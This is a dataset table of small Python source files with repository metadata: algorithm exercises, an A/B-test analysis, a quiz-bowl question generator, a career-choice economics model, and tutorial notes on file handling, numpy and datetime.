blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
d0d3da78c68c0bdb702a89cfc32ad8921a762d4b | Python | JJongSue/ssafy_algorithm | /Problem/src/boj/Main2110.py | UTF-8 | 479 | 2.78125 | 3 | [] | no_license | import sys
N, C = map(int, input().split())
nums = []
for i in range(N):
nums.append(int(input()))
nums.sort()
l = 1
r = nums[N-1] - nums[0]
ans = r
while l<=r:
mid = int((l+r)/2)
now = nums[0]
cnt = 1
for i in range(1, N):
# print(i)
d = nums[i] - now
if d >= mid:
now = nums[i]
cnt = cnt+1
# print(mid, cnt)
if cnt >= C:
l = mid+1
ans = mid
else:
r = mid-1
print(ans)
| true |
cbf3165c7c85e8e15582da1317f75cc63992d25d | Python | huangty1208/Data-Challenge | /Customer Cliff/AB_test.py | UTF-8 | 2,662 | 2.9375 | 3 | [] | no_license | # get an estimate sample size
# Packages imports
import numpy as np
import pandas as pd
import scipy.stats as stats
import statsmodels.stats.api as sms
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from math import ceil
%matplotlib inline
# Some plot styling preferences
plt.style.use('seaborn-whitegrid')
font = {'family' : 'Helvetica',
'weight' : 'bold',
'size' : 14}
mpl.rc('font', **font)
# calculate effect size by propotion
effect_size = sms.proportion_effectsize(0.13, 0.15) # Calculating effect size based on our expected rates
required_n = sms.NormalIndPower().solve_power(
effect_size,
power=0.8,
alpha=0.05,
ratio=1
) # Calculating sample size needed
required_n = ceil(required_n) # Rounding up to next whole number
print(required_n)
# get dataframe info
df.info()
pd.crosstab(df['group'], df['landing_page'])
# get sample from both groups
control_sample = df[df['group'] == 'control'].sample(n=required_n, random_state=22)
treatment_sample = df[df['group'] == 'treatment'].sample(n=required_n, random_state=22)
ab_test = pd.concat([control_sample, treatment_sample], axis=0)
ab_test.reset_index(drop=True, inplace=True)
# basic stats for both groups
conversion_rates = ab_test.groupby('group')['converted']
std_p = lambda x: np.std(x, ddof=0) # Std. deviation of the proportion
se_p = lambda x: stats.sem(x, ddof=0) # Std. error of the proportion (std / sqrt(n))
conversion_rates = conversion_rates.agg([np.mean, std_p, se_p])
conversion_rates.columns = ['conversion_rate', 'std_deviation', 'std_error']
conversion_rates.style.format('{:.3f}')
# for a very large sample, we can use the normal approximation for calculating our p-value
from statsmodels.stats.proportion import proportions_ztest, proportion_confint
control_results = ab_test[ab_test['group'] == 'control']['converted']
treatment_results = ab_test[ab_test['group'] == 'treatment']['converted']
n_con = control_results.count()
n_treat = treatment_results.count()
successes = [control_results.sum(), treatment_results.sum()]
nobs = [n_con, n_treat]
z_stat, pval = proportions_ztest(successes, nobs=nobs)
(lower_con, lower_treat), (upper_con, upper_treat) = proportion_confint(successes, nobs=nobs, alpha=0.05)
print(f'z statistic: {z_stat:.2f}')
print(f'p-value: {pval:.3f}')
print(f'ci 95% for control group: [{lower_con:.3f}, {upper_con:.3f}]')
print(f'ci 95% for treatment group: [{lower_treat:.3f}, {upper_treat:.3f}]')
# use z statistics to draw conclusion
| true |
dfe2edf746f3f9f7d0c8e8ca5d2fc13460046294 | Python | ksjpswaroop/qb | /qanta/util/build_science_mc.py | UTF-8 | 6,025 | 2.765625 | 3 | [
"MIT"
] | permissive | # Script to generate output equivalent to the AI2 Kaggle science challenge
import sqlite3
import operator
import random
from csv import DictWriter
from collections import defaultdict
from qanta import logging
from qanta.extract_features import instantiate_feature
from qanta.datasets.quiz_bowl import QuestionDatabase
log = logging.get(__name__)
COUNT_CUTOFF = 2
CHOICEIDS = "ABCDEFGHIJKLMNOP"
CATEGORIES = set("""Science
Science:Astronomy
Science:Biology
Science:Chemistry
Science:Computer_Science
Science:Earth_Science
Science:Math
Science:Mathematics
Science:Other
Mathematics
Physics
Biology
Chemistry
Earth Science
Science:Physics""".split("\n"))
class McScience:
def __init__(self, page, question, fold):
self.page = page
self.question = question
self.choices = []
self.fold = fold
self.text = None
def add_text(self, text):
self.text = text
def add_choices(self, choices):
self.choices = list(choices)
random.shuffle(self.choices)
def csv_line(self, choice_strings, destination="train"):
d = {}
d["id"] = self.question
if destination != "key":
d["question"] = self.text
for ii, cc in enumerate(self.choices):
if destination != "key":
d["answer%s" % choice_strings[ii]] = cc
if cc == self.page and (destination == "train" or destination == "key"):
d["correctAnswer"] = choice_strings[ii]
assert self.page in self.choices, "Correct answer %s not in the set %s" % \
(self.page, str(self.choices))
return d
def question_top_guesses(text, deep, guess_connection, id, page, num_guesses=4):
"""
Return the top guesses for this page
"""
c = guess_connection.cursor()
command = ('select page from guesses where sentence = 2 and token = 0 and question = %i ' +
'order by score desc limit %i') % (id, num_guesses+1)
c.execute(command)
choices = set([page])
for ii, in c:
if len(choices) < num_guesses and not ii in choices:
choices.add(ii)
# If we don't have enough guesses, generate more
new_guesses = deep.text_guess(text)
# sort the guesses and add them
for guess, score in sorted(new_guesses.items(), key=operator.itemgetter(1), reverse=True):
if len(choices) < num_guesses and not guess in choices:
choices.add(guess)
return choices
def question_first_sentence(database_connection, question):
"""
return the id, answer, and first sentence of questions in a set of categories
"""
c = database_connection.cursor()
command = 'select raw from text where question=%i' % question
c.execute(command)
for ii, in c:
return ii
def main():
import argparse
parser = argparse.ArgumentParser(description='')
default_path = 'data/'
parser.add_argument('--question_db', type=str, default=default_path + 'questions.db')
parser.add_argument('--guess_db', type=str, default=default_path + 'guesses.db',
help="Guess database")
parser.add_argument("--num_choices", type=int, default=4,
help="How many choices do we write")
parser.add_argument("--train_out", type=str, default="sci_train.csv")
parser.add_argument("--test_out", type=str, default="sci_test.csv")
parser.add_argument("--key_out", type=str, default="sci_key.csv")
flags = parser.parse_args()
# Create database connections
log.info("Opening %s" % flags.question_db)
question_database = sqlite3.connect(flags.question_db)
guess_database = sqlite3.connect(flags.guess_db)
# First get answers of interest and put them in a dictionary where the value is their count
query = 'select page from questions where page != "" and ('
query += " or ".join("category='%s'" % x for x in CATEGORIES)
query += ")"
c = question_database.cursor()
log.info(query)
c.execute(query)
answer_count = defaultdict(int)
for pp, in c:
answer_count[pp] += 1
query = 'select page, id, naqt, fold from questions where page != ""'
c = question_database.cursor()
c.execute(query)
log.info(str(list(x for x in answer_count if answer_count[x] >= COUNT_CUTOFF)))
log.info(str(len(list(x for x in answer_count if answer_count[x] >= COUNT_CUTOFF))))
# Load the DAN to generate guesses if they're missing from the database
deep = instantiate_feature("deep", QuestionDatabase(flags.question_db))
questions = {}
question_num = 0
for pp, ii, nn, ff in c:
if nn >= 0 or answer_count[pp] < COUNT_CUTOFF:
continue
question_num += 1
question = McScience(pp, ii, ff)
question.add_text(question_first_sentence(question_database, ii))
choices = question_top_guesses(question.text, deep, guess_database, ii, pp,
flags.num_choices)
question.add_choices(choices)
questions[ii] = question
if question_num % 100 == 0:
log.info('{} {} {}'.format(pp, ii, question_num))
log.info(str(choices))
answer_choices = ["answer%s" % CHOICEIDS[x] for x in range(flags.num_choices)]
train_out = DictWriter(open(flags.train_out, 'w'), ["id", "question", "correctAnswer"] +
answer_choices)
train_out.writeheader()
test_out = DictWriter(open(flags.test_out, 'w'), ["id", "question"] + answer_choices)
test_out.writeheader()
key_out = DictWriter(open(flags.key_out, 'w'), ["id", "correctAnswer"])
key_out.writeheader()
# Now write the questions out
for qq in questions.values():
log.info(qq.fold)
if qq.fold == "devtest":
test_out.writerow(qq.csv_line(CHOICEIDS, "test"))
key_out.writerow(qq.csv_line(CHOICEIDS, "key"))
else:
train_out.writerow(qq.csv_line(CHOICEIDS, "train"))
if __name__ == "__main__":
main()
| true |
1c29793cf295c17e518cc58f1184b04bb34574d8 | Python | Mostofa-Najmus-Sakib/Applied-Algorithm | /Leetcode/Python Solutions/Design Data Structure/maxStack.py | UTF-8 | 928 | 3.859375 | 4 | [
"MIT"
] | permissive | """
LeetCode Problem: 716. Max Stack
Link: https://leetcode.com/problems/max-stack/
Language: Python
Written by: Mostofa Adib Shakib
Time Complexity: O(N)
Space Complexity: O(N)
"""
class MaxStack:
def __init__(self):
self.stack = []
def push(self, x: int) -> None:
if not self.stack:
self.stack.append((x, x))
else:
maximum = max(self.stack[-1][1], x)
self.stack.append((x, maximum))
def pop(self) -> int:
return self.stack.pop()[0]
def top(self) -> int:
return self.stack[-1][0]
def peekMax(self) -> int:
return self.stack[-1][1]
def popMax(self) -> int:
maximum = self.stack[-1][1]
aux = []
while self.stack[-1][0] != maximum:
aux.append(self.stack.pop()[0])
self.stack.pop()
while aux:
self.push(aux.pop())
return maximum | true |
edcc5c2b4dfbc85e1a44ddfb39046f75a55e7d95 | Python | Laurence-mvt/AutomateTheBoringStuff | /chapter10/notes.py | UTF-8 | 2,545 | 3.53125 | 4 | [] | no_license | # chapter 10: Organizing files notes
import shutil, os
from pathlib import Path
# copy files
p = Path.cwd()
# shutil.copy(p/'AutomateTheBoringStuff/chapter10/notes.py', p/'AutomateTheBoringStuff/chapter9') # copies notes.py file to chapter9 folder
# copy a folder (tree)
# shutil.copytree(p/'AutomateTheBoringStuff/chapter10', p/'AutomateTheBoringStuff/chapter10Copy')
# move a file
# shutil.move('source', 'destination')
# delete single file at 'path'
# os.unlink('path')
# delete empty folder at 'path'
# os.rmdir('path')
# delete a folder at 'path' and all files and folders it contains
# shutil.rmtree('path')
# when deleting files/folders, good practice to run script for first time replacing
# delete method with print(files to be deleted) in its place
# instead of doing permanent delete with above, can use send2trash, for safer, soft delete (i.e. send to trash/recycle bin) - RECOMMENDED
"""import send2trash
baconFile = open('bacon.txt', 'a') # created the file
baconFile.write('Bacon is not a veg')
baconFile.close()
send2trash.send2trash('bacon.txt')"""
"""# get at the tree of the current directory with os.walk()
for folderName, subfolders, filenames in os.walk(Path.cwd()):
print('The current folder is ' + folderName)
for subfolder in subfolders:
print('SUBFOLDER OF' + folderName + ': ' + subfolder)
for filename in filenames:
print('FILE INSIDE ' + folderName + ': ' + filename)"""
# to work with zip files
import zipfile, os
from pathlib import Path
p = Path.cwd()/'AutomateTheBoringStuff'/'chapter10'
exampleZip = zipfile.ZipFile(p/'example.zip')
exampleZip.namelist() # list of strings for all files and folders contained. ['spam.txt', 'cats/', 'cats/catnames.txt', 'cats/zophie.jpg']
spamInfo = exampleZip.getinfo('spam.txt')
spamInfo.file_size
spamInfo.compress_size
print(f'Compressed file is {round(spamInfo.file_size/spamInfo.compress_size,2)}x smaller!')
exampleZip.close()
# extract from zip file
p = Path.cwd()/'AutomateTheBoringStuff'/'chapter10'
exampleZip = zipfile.ZipFile(p/'example.zip')
exampleZip.extract('specificFileOrFolder.filetype', 'destination') # to extract specific file/folder
exampleZip.extractall() # to extract entire zip file, optional argument to set which folder to extract to
exampleZip.close()
# create a zip file
newZip = zipfile.ZipFile('new.zip', 'w') # open in write mode
newZip.write('spam.txt', compress_type=zipfile.ZIP_DEFLATED) # can use other compression type parameters, but ZIP_DEFLATED works well for all data types
| true |
1c37bd8d3513c2bb7f016a7c35a315658cedb6cc | Python | sivant1361/python | /programs/SI.py | UTF-8 | 344 | 3.625 | 4 | [] | no_license | p=int(input("Principle amount="))
r=int(input("rate of interest="))
t=int(input("Number of years="))
ch=int(input("1.Simple interest\n2.Compound interest(1 or 2):"))
if (ch==1):
si=(p*r*t)/100
print("Simple interest=",si)
elif (ch==2):
ci=(p*((1+(r/100))**t))-p
print("Compound interest=",ci)
else:
print("Invalid input!!!") | true |
8c3152b19d7bb34edc569b8c9cc7679706b23ffd | Python | deepakmarathe/whirlwindtourofpython | /data_science_tools/numpy_package.py | UTF-8 | 296 | 3.59375 | 4 | [] | no_license | # Numpy : Numerical Python
import numpy as np
x = np.arange(1,10)
print x
print x ** 2
print [i ** 2 for i in range(1, 10)]
print x.reshape((3,3))
print x.reshape((3,3)).T
print np.dot(x.reshape(3,3), [5, 6, 7])
print np.linalg.eigvals(x.reshape(3,3))
M = x.reshape((3,3))
print "M : ", M
| true |
63773a9ae06e4ba916d79bfb44c55e59b2b594d1 | Python | hshrimp/test_school | /bilibili/t3.py | UTF-8 | 1,101 | 3.96875 | 4 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : wushaohong
'''
题目描述:
给定一个合法的表达式字符串,其中只包含非负整数、加法、减法以及乘法符号(不会有括号),
例如7+3*4*5+2+4-3-1,请写程序计算该表达式的结果并输出
输入
输入有多行,每行是一个表达式,输入以 END 作为结束;
输出
每行表达式的计算结果;
样例输入
7+3*4*5+2+4-3-1
2-3*1
END
样例输出
69
-1
'''
def cheng(temp):
temp3 = temp.split('*')
count = 1
for x in temp3:
count *= int(x)
return count
def jian(temp):
temp2 = temp.split('-')
count = cheng(temp2[0])
for x in temp2[1:]:
count -= cheng(x)
return count
def find(text):
count = 0
add = text.split('+')
for temp in add:
count += jian(temp)
print(count)
if __name__ == '__main__':
texts = []
tag = True
while tag:
text = input()
if text != 'END':
texts.append(text)
else:
tag = False
for text in texts:
find(text)
| true |
5632eafac5eca7cf08a78359d8b2d90468fa9c51 | Python | samuelyusunwang/quant-econ | /quantecon/career.py | UTF-8 | 2,644 | 3.578125 | 4 | [
"BSD-3-Clause"
] | permissive | """
Filename: career.py
Authors: Thomas Sargent, John Stachurski
A collection of functions to solve the career / job choice model of Neal.
"""
import numpy as np
from scipy.special import binom, beta
def gen_probs(n, a, b):
"""
Generate and return the vector of probabilities for the Beta-binomial
(n, a, b) distribution.
"""
probs = np.zeros(n+1)
for k in range(n+1):
probs[k] = binom(n, k) * beta(k + a, n - k + b) / beta(a, b)
return probs
class workerProblem:
def __init__(self, B=5.0, beta=0.95, N=50, F_a=1, F_b=1, G_a=1, G_b=1):
self.beta, self.N, self.B = beta, N, B
self.theta = np.linspace(0, B, N) # set of theta values
self.epsilon = np.linspace(0, B, N) # set of epsilon values
self.F_probs = gen_probs(N-1, F_a, F_b)
self.G_probs = gen_probs(N-1, G_a, G_b)
self.F_mean = np.sum(self.theta * self.F_probs)
self.G_mean = np.sum(self.epsilon * self.G_probs)
def bellman(w, v):
"""
The Bellman operator.
* w is an instance of workerProblem
* v is a 2D NumPy array representing the value function
The array v should be interpreted as v[i, j] = v(theta_i, epsilon_j).
Returns the updated value function Tv as an array of shape v.shape
"""
new_v = np.empty(v.shape)
for i in range(w.N):
for j in range(w.N):
v1 = w.theta[i] + w.epsilon[j] + w.beta * v[i, j]
v2 = w.theta[i] + w.G_mean + w.beta * np.dot(v[i, :], w.G_probs)
v3 = w.G_mean + w.F_mean + w.beta * \
np.dot(w.F_probs, np.dot(v, w.G_probs))
new_v[i, j] = max(v1, v2, v3)
return new_v
def get_greedy(w, v):
"""
Compute optimal actions taking v as the value function. Parameters are
the same as for bellman(). Returns a 2D NumPy array "policy", where
policy[i, j] is the optimal action at state (theta_i, epsilon_j). The
optimal action is represented as an integer in the set 1, 2, 3, where 1 =
'stay put', 2 = 'new job' and 3 = 'new life'
"""
policy = np.empty(v.shape, dtype=int)
for i in range(w.N):
for j in range(w.N):
v1 = w.theta[i] + w.epsilon[j] + w.beta * v[i, j]
v2 = w.theta[i] + w.G_mean + w.beta * np.dot(v[i, :], w.G_probs)
v3 = w.G_mean + w.F_mean + w.beta * \
np.dot(w.F_probs, np.dot(v, w.G_probs))
if v1 > max(v2, v3):
action = 1
elif v2 > max(v1, v3):
action = 2
else:
action = 3
policy[i, j] = action
return policy
| true |
ec61526afc6ee2ff18bbaef230e1190feeef903f | Python | rogue0137/practice | /leetcode_python/medium/SOLVED-minimum-cost-to-connect-sticks.py | UTF-8 | 1,616 | 3.921875 | 4 | [] | no_license | # 1167. Minimum Cost to Connect Sticks
# https://leetcode.com/problems/minimum-cost-to-connect-sticks/
class Solution:
def connectSticks(self, sticks: List[int]) -> int:
sticks.sort()
cost = 0
stack = []
while len(sticks) + len(stack) > 1:
print('LOOP')
print(f'len sticks: {len(sticks)}')
print(f'len stacks: {len(stack)}')
print('a')
a = self.leftpop(sticks, stack)
print('b')
b = self.leftpop(sticks, stack)
print(f'a: {a}, b: {b}')
curr_cost = a+b
print(f'cost before addition: {cost}')
cost += curr_cost
print(f'new cost: {cost}')
print(f'appending to stack')
stack.append(curr_cost)
print(f'stack: {stack}')
return cost
def leftpop(self, sticks: List[int], stack: List[int]) -> int:
if not sticks:
print(f'no sticks, popping first from stack')
return stack.pop(0)
if not stack:
print(f'no stack, popping first from sticks')
return sticks.pop(0)
if sticks[0] < stack[0]:
print(f'sticks bigger than stack')
return sticks.pop(0)
else:
print(f'stack bigger than or equal to sticks')
return stack.pop(0)
# Without comments
# Runtime: 436 ms, faster than 23.45% of Python3 online submissions for Minimum Cost to Connect Sticks.
# Memory Usage: 14.6 MB, less than 65.28% of Python3 online submissions for Minimum Cost to Connect Sticks.
# RETRY USING HEAP | true |
dc598bbc0e77037fc67ea86b90bb49681373fb67 | Python | portelaraian/algo-expert | /coding-interview-questions/find-duplicate-value/solution.py | UTF-8 | 286 | 3.515625 | 4 | [
"MIT"
] | permissive | # O(n) time | O(n) space - where n is the length of the input array
def firstDuplicateValue(array):
dict_values = {}
for value in array:
try:
dict_values[value] += 1
return value
except:
dict_values[value] = 1
return -1
| true |
d892ac639b3d0138e5ef950485e96e7d544833db | Python | bagustris/lpthw | /ex22-noFailure.py | UTF-8 | 303 | 2.578125 | 3 | [] | no_license | # ini adalah ex22.py
# Apa yang sudah kamu pelajari dari lthw ini...?
print """
Apa yang sudah kamu pelajari sejauh ini?
Peringatan
Hal terpenting ketika melakukan ini adalah: "Tidak ada kegagalan, HANYA MENCOBA, Tidak ada yang baru (kecuali kamu membuat improvisasi terhadap kode yang disediakan)
"""
| true |
d750ac08a984ad23cda9016035455da4c3d68902 | Python | Guilherme-Felix/Intro-Metodos-Discretos | /Exercicio1_EulerModificado.py | UTF-8 | 977 | 3.328125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from scipy import optimize
'''
Implementacao do metodo de euler modificado, segundo a ref.
https://www.ufrgs.br/reamat/CalculoNumerico/livro-py/pdvi-metodo_de_euler_melhorado.html
'''
interval = (0,1)
h = 1./30
N1 = 30
N2 = 135
h1 = 1./N1
h2 = 1./N2
x1 = np.arange(0,1,h1)
x2 = np.arange(0,1,h2)
y1 = np.zeros(N1)
y2 = np.zeros(N2)
y1[0] = 1
y2[0] = 1
def f(Y):
return np.arctan(Y)
# Metodo de Euler Modificado - 30 -pontos
for k in range(N1-1):
yk = y1[k] + h1*f(y1[k])
y1[k+1] = y1[k] + (h1/2)*( f(y1[k]) + f(yk))
# Metodo de Euler Modificado - 135 -pontos
for k in range(N2-1):
yk = y2[k] + h2*f(y2[k])
y2[k+1] = y2[k] + (h2/2)*( f(y2[k]) + f(yk))
# Plot do grafico
plt.plot(x1, y1, 'r.', label="30 pontos", linewidth=1)
plt.plot(x2, y2, 'b:', label="135 pontos", linewidth=1)
plt.title("Metodo de Euler Modificado")
plt.legend()
plt.grid()
plt.savefig("Euler_modificado.png")
plt.show()
| true |
d25f215c8cacc7a5be4c10603f3131b39b3d5c7e | Python | juan7732/Advent-Of-Code-2020 | /Day4/advent.py | UTF-8 | 2,726 | 3.21875 | 3 | [] | no_license | from functools import reduce
import re
def composite_function(*func):
def compose(f, g):
return lambda x: g(f(x))
return reduce(compose, func, lambda x: x)
def read_data():
with open('data.txt') as f:
return f.read()
def parse_data(data):
tmp = data.split('\n\n')
for i in range(0, len(tmp)):
tmp[i] = tmp[i].replace('\n', ' ')
return tmp
def validate_passport(passport):
req_keys = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']
opt_keys = ['cid']
for req_key in req_keys:
if req_key in passport.keys():
pass
else:
return False
return True
def validate_passport_complex(passport):
req_keys = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']
for req_key in req_keys:
if req_key not in passport.keys():
return False
if re.search('(19[2-9][0-9]|200[1-2])', passport['byr']) is None:
return False
if re.search('(201[0-9]|2020)', passport['iyr']) is None:
return False
if re.search('(202[0-9]|2030)', passport['eyr']) is None:
return False
if re.search('(59in|6[0-9]in|7[0-6]in|1[5-8][0-9]cm|19[0-3]cm)', passport['hgt']) is None:
return False
if re.search('(#[0-f]{6})', passport['hcl']) is None:
return False
if re.search('(amb|blu|brn|gry|grn|hzl|oth)', passport['ecl']) is None:
return False
if re.search('([0-9]{9})', passport['pid']) is None:
return False
return True
def validate_passports(passports):
valid_passports = 0
invalid_passports = 0
for passport in passports:
passport_dictionary = process_data_to_dict(passport)
if validate_passport(passport_dictionary):
valid_passports += 1
else:
invalid_passports += 1
return valid_passports, invalid_passports
def validate_passports_complex(passports):
valid_passports = 0
invalid_passports = 0
for passport in passports:
passport_dictionary = process_data_to_dict(passport)
if validate_passport_complex(passport_dictionary):
valid_passports += 1
else:
invalid_passports += 1
return valid_passports, invalid_passports
def process_data_to_dict(passport):
passport_kvp = {}
passport_list = passport.split(' ')
for passport_element in passport_list:
kvp = passport_element.split(':')
passport_kvp[kvp[0]] = kvp[1]
return passport_kvp
advent_part_1 = composite_function(
parse_data,
validate_passports,
print
)
advent_part_2 = composite_function(
parse_data,
validate_passports_complex,
print
)
advent_part_1(read_data())
advent_part_2(read_data())
| true |
ebc4be08bc5c4c6a23bb1e4168fe85d8968eccd3 | Python | Cebuick/test | /test/test.py | UTF-8 | 787 | 3.109375 | 3 | [] | no_license | import sqlite3
#connect() permet de se connecter
connexion = sqlite3.connect('D:/workspace/python/test/test/jobs.db')
#cursor()
curseur = connexion.cursor() #creation du curseur
query="select major from recent_grads;"
#print('1 '+ str(curseur.fetchone()))
curseur.execute(query) #exécute la requête SQL situé dans la viriable query et ce curseur convertit les résultats en t-uples pour ls stocker en local
#print('2 '+ str(curseur.fetchone()))
result1=curseur.fetchone() #Chercher le premier résultat dans la variable locale
result2=curseur.fetchone() #Chercher le seuxième résultat dans la variable locale
next_five_results=curseur.fetchmany(5)
all_results=curseur.fetchall()
print(result1)
print(result2)
print(next_five_results)
print(all_results[0:5])
connexion.close()
| true |
f70dbfbef4499d0858fb66296dbd8967ecbd76c3 | Python | nickderobertis/data-code | /datacode/summarize/subset/outliers/detail/totex.py | UTF-8 | 4,050 | 2.75 | 3 | [
"MIT"
] | permissive | import pyexlatex.table as lt
import pandas as pd
from datacode.summarize import format_numbers_to_decimal_places
from datacode.typing import DfDict, Document
from datacode.typing import DocumentOrTables, DocumentOrTablesOrNone
def outlier_by_column_summary(bad_df_dict: DfDict, selected_orig_df_dict: DfDict,
keep_num_rows: int =40, output: bool =False,
outdir: str = None, as_document=True, author: str=None) -> DocumentOrTables:
all_tables = []
for col in bad_df_dict:
all_tables.append(
outlier_summary_for_col(
bad_df_dict,
selected_orig_df_dict,
col,
keep_num_rows=keep_num_rows,
output=False,
as_document=False
)
)
all_tables = [table for table in all_tables if table is not None]
full_title = 'Outlier Summary'
document = Document.from_ambiguous_collection(
all_tables,
title=full_title,
author=author
)
if output:
assert outdir is not None
document.to_pdf_and_move(
outdir,
outname=full_title,
as_document=True
)
if as_document:
return document
else:
return all_tables
def outlier_summary_for_col(bad_df_dict: DfDict, selected_orig_df_dict: DfDict,
col: str, keep_num_rows: int =40, output: bool =False,
outdir: str = None, as_document=True, author: str=None) -> DocumentOrTablesOrNone:
bad_df = bad_df_dict[col]
selected_orig_df = selected_orig_df_dict[col]
if len(bad_df) == 0:
print(f'No outliers for {col}. Will not add tables.')
return None
bad_table = _firm_list_table_from_df(
bad_df,
col,
keep_num_rows=keep_num_rows,
caption=f'Largest Outliers for {col}',
below_text=f'''This table shows the largest outliers for {col}.''',
output=False
)
selected_df_tables = []
processed_rows = 0
while processed_rows < len(selected_orig_df):
selected_df_table = _firm_list_table_from_df(
selected_orig_df.iloc[processed_rows:processed_rows + keep_num_rows],
col,
keep_num_rows=keep_num_rows,
caption=f'Outlier Firm Series for {col}',
below_text=f'''This table shows observations leading up to, including, and after outliers for {col}.''',
output=False
)
selected_df_tables.append(selected_df_table)
processed_rows += keep_num_rows
full_title = 'Outlier Summary for {col}'
document = Document.from_ambiguous_collection(
[bad_table] + selected_df_tables,
title=full_title,
author=author
)
if output:
assert outdir is not None
document.to_pdf_and_move(
outdir,
outname=full_title,
as_document=True
)
if as_document:
return document
else:
return [bad_table] + selected_df_tables
def _firm_list_table_from_df(df: pd.DataFrame, col: str,
keep_num_rows: int =40, caption: str =None,
below_text: str =None, output: bool =False,
outdir: str =None) -> lt.Table:
if caption is None:
caption =f'Largest Outliers for {col}'
if below_text is None:
below_text = f'''
This table shows the largest outliers for {col}.
'''
formatted_df = df.iloc[:keep_num_rows].applymap(format_numbers_to_decimal_places)
align_str = 'll' + 'c' * (len(formatted_df.columns) - 2)
table = lt.Table.from_list_of_lists_of_dfs(
[[formatted_df]],
caption=caption,
below_text=below_text,
align=align_str,
landscape=True
)
if output:
assert outdir is not None
table.to_pdf_and_move(
outdir,
outname=caption
)
return table
| true |
f5e09d4520283c58490f0421fe3fda5d6450a091 | Python | eyelivermore/pythonlianxi | /py/集合数据结构.py | UTF-8 | 1,246 | 4.8125 | 5 | [] | no_license |
'''
集合是一个无序不重复元素的集。基本功能包括关系测试和消除重复元素。
'''
basket = {'apple', 'orange', 'apple', 'pear', 'orange', 'banana'}
"""
可以用大括号({})创建集合。
注意:如果要创建一个空集合,你必须用 set() 而不是 {} ;后者创建一个空的字典,下一节我们会介绍这个数据结构
"""
a = set()
# 以下演示了两个集合的操作
a = set('abcd')
b = set('cdef')
print('a集合中的字母\n',a)
print('b集合中的字母\n',b)
print('a-b:集合a中包含,b中不包含,也叫集体的差集\n',a-b)
print('a|b:集合a或b中包含的所有元素,也叫集合的并集\n',a|b)
print('a&b:集合a和b中都包含了的元素,也中集集合的交集\n',a&b)
print('a^b:不同时包含于a和b的元素,也叫集合中的补集\n',a^b)
print('集合的增,删,改,查')
print('集合的增加用add(x)和update(x)函数')
a.add("f")
print('a.add("f")',a)
print('删用remove(x)删除指定元素')
a.remove('f')
print('a.remove("f")',a)
print('集合中的元素不能修改')
print('判断元素 x 是否在集合 s 中,存在返回 True,不存在返回 False。')
print('"f" in a 判断f是否在a集合中',"f" in a)
print("set") | true |
aa401e50bdcae7188904e8c3f0d492c136984e44 | Python | google/earthengine-community | /samples/python/apidocs/ee_featurecollection_getnumber.py | UTF-8 | 993 | 2.578125 | 3 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | # Copyright 2023 The Google Earth Engine Community Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# [START earthengine__apidocs__ee_featurecollection_getnumber]
# A FeatureCollection with a number property value.
fc = ee.FeatureCollection([]).set('number_property', 1.5)
# Fetch the number property value as an ee.Number object.
print('Number property value as ee.Number:',
fc.getNumber('number_property').getInfo())
# [END earthengine__apidocs__ee_featurecollection_getnumber]
| true |
5fe47b6541bc1f32c8dba67ab90923ef7f70929a | Python | HigorSenna/python-study | /guppe/manipulando_arquivos_csv_e_json/json_com_pickle.py | UTF-8 | 885 | 3.625 | 4 | [] | no_license | """
Trabalhando com JSON + Pickle
pip install jsonpickle
"""
import json
import jsonpickle
class Cachorro:
def __init__(self, nome):
self.__nome = nome
def latir(self):
print(f'{self.nome} está latindo')
@property
def nome(self):
return self.__nome
cachorro = Cachorro('Pluto')
json_string = json.dumps(['produto', {'Playstation4': ('2TB', 'Novo', '220V')}])
print(json_string)
cachorro_json = json.dumps(cachorro.__dict__)
print(cachorro_json)
# JSON PICKLE
ret = jsonpickle.encode(cachorro)
print(ret)
# Escrevendo com JSON PICKLE
with open('cachorro.json', 'w') as arquivo:
ret = jsonpickle.encode(cachorro)
arquivo.write(ret)
# Lendo com JSON PICKLE
with open('cachorro.json', 'r') as arquivo:
conteudo = arquivo.read()
cachorro_by_json: Cachorro = jsonpickle.decode(conteudo)
print(cachorro_by_json.nome) | true |
2ff7a82c8c4df3ea13a7e464f4c7402f9424d7e2 | Python | angelicaba23/MisionTic2022 | /Python/area_triangulo.py | UTF-8 | 628 | 4.34375 | 4 | [] | no_license | """
------------MinTic-----------------
-------------UPB-------------------
-------Angélica Barranco-----------
"""
#Elabore un algoritmo que lea los 3 lados de un triángulo cualquiera y calcule su área, considerar: Si A, B y C son los lados, y S el semiperímetro.
import numpy as np
#Entradas
a = float(input("Digite el valor de a "))
b = float(input("Digite el valor de b "))
c = float(input("Digite el valor de c "))
# Procesos
s = (a +b + c) / 2
arg = s*(s-a)*(s-b)*(s-c)
area = np.sqrt(arg)
#Salida
print("El triangulo de lados a = ", a, ", b = ", b, " c = ", c, " tiene un semiperímetro = ", s, "y area = ", area)
| true |
010042edc151e9a39c8d92d08e1e785b04e69f9f | Python | entirelymagic/PrivatePython | /Learning/date_and_time.py | UTF-8 | 476 | 3.75 | 4 | [] | no_license | """
You have to allways point to a central reference
when you speak about the time.
"""
from datetime import datetime, timezone, timedelta
print(datetime.now(timezone.utc)) # time with no offset
today = datetime.now(timezone.utc)
tomorrow = today + timedelta(days=1)
print(today)
print(tomorrow)
print(today.strftime('%d-%m-%Y %H:%M:%S'))
user_date = input('Enter the date in YYYY--mm-dd format:')
user_date = datetime.strptime(user_date, '%Y-%m-%d')
print(user_date)
| true |
